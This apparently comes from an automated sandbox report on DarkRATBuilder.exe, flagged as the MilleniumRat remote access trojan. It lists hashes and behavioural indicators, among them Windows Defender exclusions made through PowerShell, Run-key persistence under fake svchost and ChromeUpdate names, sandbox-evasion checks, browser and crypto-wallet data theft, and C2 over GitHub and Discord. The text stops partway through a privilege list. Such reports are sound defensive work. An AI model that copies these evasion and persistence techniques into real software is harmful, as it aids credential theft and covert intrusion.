Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
29-05-2024 02:50
Behavioral task
behavioral1
Sample
DarkRATBuilder.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
DarkRATBuilder.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
main.pyc
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
main.pyc
Resource
win10v2004-20240426-en
General
-
Target
DarkRATBuilder.exe
-
Size
35.2MB
-
MD5
ab30bdd94d86e5546b02d5bdb62f238b
-
SHA1
03b20cc376db4af83c74e8f51eb83aaa6a26a904
-
SHA256
44f36dc1c320aa66475542842ee04f9e8e22841071c7ae0b25563bd2c3b78d5d
-
SHA512
18876c581903e95f45cf8d59fc6a2de865d074a2a9e641c5ce242413b093e50a77fcd37e3d95adb37de2c17242732df27b9c7656423491f72d4e1d4f2f6ee21f
-
SSDEEP
786432:lRaNrV2IXxHOueDcZdDPbp1m7Uwai+lkWppvlqKtKN:lR0rV5uuFp1cDai+2WfIKtK
Malware Config
Signatures
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
Processes:
setup.exeupdater.exedescription pid process target process PID 2004 created 3436 2004 setup.exe Explorer.EXE PID 2004 created 3436 2004 setup.exe Explorer.EXE PID 2004 created 3436 2004 setup.exe Explorer.EXE PID 2004 created 3436 2004 setup.exe Explorer.EXE PID 2004 created 3436 2004 setup.exe Explorer.EXE PID 2004 created 3436 2004 setup.exe Explorer.EXE PID 3396 created 3436 3396 updater.exe Explorer.EXE PID 3396 created 3436 3396 updater.exe Explorer.EXE PID 3396 created 3436 3396 updater.exe Explorer.EXE PID 3396 created 3436 3396 updater.exe Explorer.EXE PID 3396 created 3436 3396 updater.exe Explorer.EXE PID 3396 created 3436 3396 updater.exe Explorer.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1248 powershell.exe 3496 powershell.exe 6192 powershell.exe 8912 powershell.exe 6396 powershell.exe -
Contacts a large (1228) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
main.exeUpdate.exeBuild.exes.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation main.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation Update.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation Build.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation s.exe -
Executes dropped EXE 13 IoCs
Processes:
Build.exehacn.exehacn.exes.exebased.exebased.exemain.exesvchost.exesetup.exesvchost.exerar.exeUpdate.exeupdater.exepid process 1164 Build.exe 632 hacn.exe 3676 hacn.exe 4904 s.exe 4672 based.exe 4972 based.exe 4628 main.exe 3832 svchost.exe 2004 setup.exe 2192 svchost.exe 8164 rar.exe 396 Update.exe 3396 updater.exe -
Loads dropped DLL 51 IoCs
Processes:
DarkRATBuilder.exehacn.exebased.exemain.exesvchost.exeUpdate.exepid process 3048 DarkRATBuilder.exe 3048 DarkRATBuilder.exe 3048 DarkRATBuilder.exe 3676 hacn.exe 3676 hacn.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4972 based.exe 4628 main.exe 4972 based.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 2192 svchost.exe 396 Update.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI35322\python310.dll upx behavioral2/memory/3048-58-0x00007FFFB78F0000-0x00007FFFB7D56000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI35322\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35322\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35322\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35322\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35322\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35322\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35322\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35322\libcrypto-1_1.dll upx behavioral2/memory/3048-110-0x00007FFFB78F0000-0x00007FFFB7D56000-memory.dmp upx behavioral2/memory/4972-209-0x00007FFFB7130000-0x00007FFFB7596000-memory.dmp upx behavioral2/memory/4972-211-0x00007FFFCAF90000-0x00007FFFCAF9F000-memory.dmp upx behavioral2/memory/4972-210-0x00007FFFBE220000-0x00007FFFBE244000-memory.dmp upx behavioral2/memory/4972-222-0x00007FFFB7E80000-0x00007FFFB7EAC000-memory.dmp upx behavioral2/memory/4972-224-0x00007FFFC54D0000-0x00007FFFC54EF000-memory.dmp upx behavioral2/memory/4972-225-0x00007FFFB6E10000-0x00007FFFB6F8A000-memory.dmp upx behavioral2/memory/4972-223-0x00007FFFC5F90000-0x00007FFFC5FA8000-memory.dmp upx behavioral2/memory/4972-235-0x00007FFFCAC50000-0x00007FFFCAC5D000-memory.dmp upx behavioral2/memory/4972-236-0x00007FFFB7E50000-0x00007FFFB7E7E000-memory.dmp upx behavioral2/memory/4972-242-0x00007FFFB69D0000-0x00007FFFB6D49000-memory.dmp upx behavioral2/memory/4972-250-0x00007FFFC92F0000-0x00007FFFC92FD000-memory.dmp upx behavioral2/memory/4972-249-0x00007FFFB7E10000-0x00007FFFB7E25000-memory.dmp upx behavioral2/memory/4972-239-0x00007FFFB6D50000-0x00007FFFB6E08000-memory.dmp upx behavioral2/memory/4972-234-0x00007FFFBDC70000-0x00007FFFBDC89000-memory.dmp upx behavioral2/memory/4972-320-0x00007FFFB2B50000-0x00007FFFB2C68000-memory.dmp upx behavioral2/memory/4972-1919-0x00007FFFB7130000-0x00007FFFB7596000-memory.dmp upx behavioral2/memory/4972-1971-0x00007FFFBE220000-0x00007FFFBE244000-memory.dmp upx behavioral2/memory/4972-2415-0x00007FFFB6E10000-0x00007FFFB6F8A000-memory.dmp upx behavioral2/memory/4972-2414-0x00007FFFC54D0000-0x00007FFFC54EF000-memory.dmp upx behavioral2/memory/4972-2463-0x00007FFFBDC70000-0x00007FFFBDC89000-memory.dmp upx behavioral2/memory/4972-2513-0x00007FFFB7E50000-0x00007FFFB7E7E000-memory.dmp upx behavioral2/memory/4972-2565-0x00007FFFB6D50000-0x00007FFFB6E08000-memory.dmp upx behavioral2/memory/4972-2566-0x00007FFFB69D0000-0x00007FFFB6D49000-memory.dmp upx behavioral2/memory/4972-3296-0x00007FFFBE220000-0x00007FFFBE244000-memory.dmp upx behavioral2/memory/4972-3295-0x00007FFFB7130000-0x00007FFFB7596000-memory.dmp upx behavioral2/memory/4972-3298-0x00007FFFB7E80000-0x00007FFFB7EAC000-memory.dmp upx behavioral2/memory/4972-3305-0x00007FFFB6D50000-0x00007FFFB6E08000-memory.dmp upx behavioral2/memory/4972-3309-0x00007FFFB2B50000-0x00007FFFB2C68000-memory.dmp upx behavioral2/memory/4972-3308-0x00007FFFC92F0000-0x00007FFFC92FD000-memory.dmp upx behavioral2/memory/4972-3307-0x00007FFFB7E10000-0x00007FFFB7E25000-memory.dmp upx behavioral2/memory/4972-3306-0x00007FFFB69D0000-0x00007FFFB6D49000-memory.dmp upx behavioral2/memory/4972-3304-0x00007FFFCAC50000-0x00007FFFCAC5D000-memory.dmp upx behavioral2/memory/4972-3303-0x00007FFFB7E50000-0x00007FFFB7E7E000-memory.dmp upx behavioral2/memory/4972-3302-0x00007FFFBDC70000-0x00007FFFBDC89000-memory.dmp upx behavioral2/memory/4972-3297-0x00007FFFCAF90000-0x00007FFFCAF9F000-memory.dmp upx behavioral2/memory/4972-3301-0x00007FFFB6E10000-0x00007FFFB6F8A000-memory.dmp upx behavioral2/memory/4972-3300-0x00007FFFC54D0000-0x00007FFFC54EF000-memory.dmp upx behavioral2/memory/4972-3299-0x00007FFFC5F90000-0x00007FFFC5FA8000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
svchost.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 28 raw.githubusercontent.com 32 raw.githubusercontent.com 73 raw.githubusercontent.com 87 discord.com 88 discord.com 27 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ip-api.com 37 api.ipify.org 38 api.ipify.org -
Drops file in System32 directory 13 IoCs
Processes:
svchost.exesvchost.exeOfficeClickToRun.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
svchost.exepid process 2192 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
setup.exeupdater.exedescription pid process target process PID 2004 set thread context of 6344 2004 setup.exe dialer.exe PID 3396 set thread context of 5864 3396 updater.exe dialer.exe PID 3396 set thread context of 4712 3396 updater.exe dialer.exe PID 3396 set thread context of 6820 3396 updater.exe dialer.exe -
Drops file in Program Files directory 1 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe setup.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 6768 sc.exe 5452 sc.exe 5696 sc.exe 5112 sc.exe 6776 sc.exe 3668 sc.exe 6372 sc.exe 5240 sc.exe 5636 sc.exe 5764 sc.exe -
Detects Pyinstaller 2 IoCs
Processes:
resource yara_rule C:\ProgramData\Microsoft\hacn.exe pyinstaller C:\ProgramData\svchost.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exeUpdate.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 6248 schtasks.exe 5824 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 8132 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 792 tasklist.exe 788 tasklist.exe 6264 tasklist.exe 8040 tasklist.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies data under HKEY_USERS 60 IoCs
Processes:
powershell.exesvchost.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 29 May 2024 02:52:02 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5436FE63-05F9-49BF-A4B9-404397A5E0C9}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716951120" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Modifies registry class 4 IoCs
Processes:
RuntimeBroker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exemain.exepowershell.exepowershell.exepid process 4880 powershell.exe 4880 powershell.exe 1248 powershell.exe 1248 powershell.exe 3496 powershell.exe 3496 powershell.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 4628 main.exe 6268 powershell.exe 6268 powershell.exe 3496 powershell.exe 3496 powershell.exe 4880 powershell.exe 4880 powershell.exe 1248 powershell.exe 1248 powershell.exe 6396 powershell.exe 6396 powershell.exe 6396 powershell.exe 6268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
main.exetasklist.exepowershell.exepowershell.exepowershell.exetasklist.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exeUpdate.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4628 main.exe Token: SeDebugPrivilege 792 tasklist.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 3496 powershell.exe Token: SeDebugPrivilege 788 tasklist.exe Token: SeIncreaseQuotaPrivilege 6216 WMIC.exe Token: SeSecurityPrivilege 6216 WMIC.exe Token: SeTakeOwnershipPrivilege 6216 WMIC.exe Token: SeLoadDriverPrivilege 6216 WMIC.exe Token: SeSystemProfilePrivilege 6216 WMIC.exe Token: SeSystemtimePrivilege 6216 WMIC.exe Token: SeProfSingleProcessPrivilege 6216 WMIC.exe Token: SeIncBasePriorityPrivilege 6216 WMIC.exe Token: SeCreatePagefilePrivilege 6216 WMIC.exe Token: SeBackupPrivilege 6216 WMIC.exe Token: SeRestorePrivilege 6216 WMIC.exe Token: SeShutdownPrivilege 6216 WMIC.exe Token: SeDebugPrivilege 6216 WMIC.exe Token: SeSystemEnvironmentPrivilege 6216 WMIC.exe Token: SeRemoteShutdownPrivilege 6216 WMIC.exe Token: SeUndockPrivilege 6216 WMIC.exe Token: SeManageVolumePrivilege 6216 WMIC.exe Token: 33 6216 WMIC.exe Token: 34 6216 WMIC.exe Token: 35 6216 WMIC.exe Token: 36 6216 WMIC.exe Token: SeDebugPrivilege 6264 tasklist.exe Token: SeDebugPrivilege 6268 powershell.exe Token: SeIncreaseQuotaPrivilege 6216 WMIC.exe Token: SeSecurityPrivilege 6216 WMIC.exe Token: SeTakeOwnershipPrivilege 6216 WMIC.exe Token: SeLoadDriverPrivilege 6216 WMIC.exe Token: SeSystemProfilePrivilege 6216 WMIC.exe Token: SeSystemtimePrivilege 6216 WMIC.exe Token: SeProfSingleProcessPrivilege 6216 WMIC.exe Token: SeIncBasePriorityPrivilege 6216 WMIC.exe Token: SeCreatePagefilePrivilege 6216 WMIC.exe Token: SeBackupPrivilege 6216 WMIC.exe Token: SeRestorePrivilege 6216 WMIC.exe Token: SeShutdownPrivilege 6216 WMIC.exe Token: SeDebugPrivilege 6216 WMIC.exe Token: SeSystemEnvironmentPrivilege 6216 WMIC.exe Token: SeRemoteShutdownPrivilege 6216 WMIC.exe Token: SeUndockPrivilege 6216 WMIC.exe Token: SeManageVolumePrivilege 6216 WMIC.exe Token: 33 6216 WMIC.exe Token: 34 6216 WMIC.exe Token: 35 6216 WMIC.exe Token: 36 6216 WMIC.exe Token: SeDebugPrivilege 6396 powershell.exe Token: SeDebugPrivilege 7696 powershell.exe Token: SeDebugPrivilege 7860 powershell.exe Token: SeDebugPrivilege 8040 tasklist.exe Token: SeDebugPrivilege 396 Update.exe Token: SeIncreaseQuotaPrivilege 8264 WMIC.exe Token: SeSecurityPrivilege 8264 WMIC.exe Token: 